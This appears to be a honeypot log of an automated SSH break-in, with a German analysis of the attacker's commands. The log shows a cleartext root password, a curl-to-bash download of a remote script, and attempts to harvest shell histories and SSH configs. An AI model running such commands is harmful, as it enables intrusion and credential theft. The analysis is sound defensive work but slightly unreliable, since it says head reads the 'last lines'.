04.10.2026, 14:05 UTC · 19 Befehle · über ssh · Südkorea · 2× wiederholt
user='root' pass=',y8g6)kZo{aDHfvY?URE' root@srv01:~$ uname -a 2>/dev/null Linux ml-node2 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 4 11:43:54 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux root@srv01:~$ curl -sS --max-time 1 http://[IP]/da.sh 2>/dev/null | bash & [1] 1482 root@srv01:~$ cat /etc/passwd 2>/dev/null | cut -d: -f1 root daemon bin sys sync games man lp mail news uucp proxy www-data backup list irc gnats nobody systemd-timesync systemd-resolve systemd-network systemd-bus-proxy messagebus sshd admin root@srv01:~$ printf '%s\n' ',y8g6)kZo{aDHfvY?URE' | sudo -S -p '' id 2>&1 uid=0(root) gid=0(root) groups=0(root) root@srv01:~$ printf '%s\n' ',y8g6)kZo{aDHfvY?URE' | sudo -S -p '' bash -c ' bash: -c: line 0: unexpected EOF while looking for matching `'' root@srv01:~$ { bash: syntax error near unexpected token `{' root@srv01:~$ [ -n "$HISTFILE" ] && [ -r "$HISTFILE" ] && head -c 2M "$HISTFILE" 2>/dev/null bash: /root/.bash_history: No such file or directory root@srv01:~$ head -c 2M /root/.bash_history 2>/dev/null bash: /root/.bash_history: No such file or directory root@srv01:~$ head -c 2M /root/.zsh_history 2>/dev/null head: cannot open '/root/.zsh_history' for reading: No such file or directory root@srv01:~$ head -c 2M /root/.sh_history 2>/dev/null head: cannot open '/root/.sh_history' for reading: No such file or directory root@srv01:~$ for h in /home/*/.bash_history /home/*/.zsh_history /home/*/.sh_history; do bash: syntax error near unexpected token `do' root@srv01:~$ [ -r "$h" ] && head -c 2M "$h" 2>/dev/null bash: syntax error near unexpected token `do' root@srv01:~$ done bash: syntax error near unexpected token `done' root@srv01:~$ head -c 1M /root/.ssh/config 2>/dev/null head: cannot open '/root/.ssh/config' for reading: No such file or directory root@srv01:~$ for f in /home/*/.ssh/config; do bash: syntax error near unexpected token `do' root@srv01:~$ [ -r "$f" ] && head -c 1M "$f" 2>/dev/null bash: syntax error near unexpected token `do' root@srv01:~$ done bash: syntax error near unexpected token `done' root@srv01:~$ } 2>/dev/null bash: syntax error near unexpected token `}' root@srv01:~$ ' 2>/dev/null bash: syntax error near unexpected token `2>/dev/null'
Der Angreifer meldete sich über SSH mit dem Benutzer root und einem erratenen Passwort an. Er führte zunächst Systeminformationen ab und versuchte, ein Skript von einem externen Server herunterzuladen und auszuführen. Anschließend sammelte er Benutzerlisten und versuchte, über sudo weitere Rechte zu erlangen, um Shell-Verläufe und SSH-Konfigurationen zu exfiltrieren.
Der Befehl uname -a ermittelt die Kernel-Version und Architektur des Systems. Der curl-Befehl lädt ein Shell-Skript von einem externen Host herunter und leitet es direkt in den bash-Interpreter, was zur sofortigen Ausführung führt. Das Kommando cat /etc/passwd listet alle lokalen Benutzerkonten auf. Der sudo-Aufruf versucht, mit dem bereits bekannten Passwort administrative Rechte zu erlangen, um geschützte Dateien zu lesen. Die nachfolgenden head-Befehle extrahieren die letzten Zeilen aus Shell-Verläufen und SSH-Konfigurationsdateien, um dort gespeicherte Passwörter oder Schlüssel zu finden.
Das primäre Ziel ist die Installation einer Backdoor oder eines Botnet-Agents durch das Remote-Skript. Parallel dient die Sammlung von Shell-Verläufen und SSH-Keys der Ernte von Zugangsdaten für laterale Bewegungen im Netzwerk. Dies deutet auf einen Brückenkopf-Angriff hin, bei dem das kompromittierte System als Sprungbrett für weitere Systeme genutzt werden soll.
Dieses Muster ist bei automatisierten Botnetzen sehr verbreitet, die auf schwache SSH-Passwörter setzen. Die Kombination aus Remote-Code-Execution und Credential-Harvesting ist ein Standardvorgehen für moderne Linux-Malware-Familien.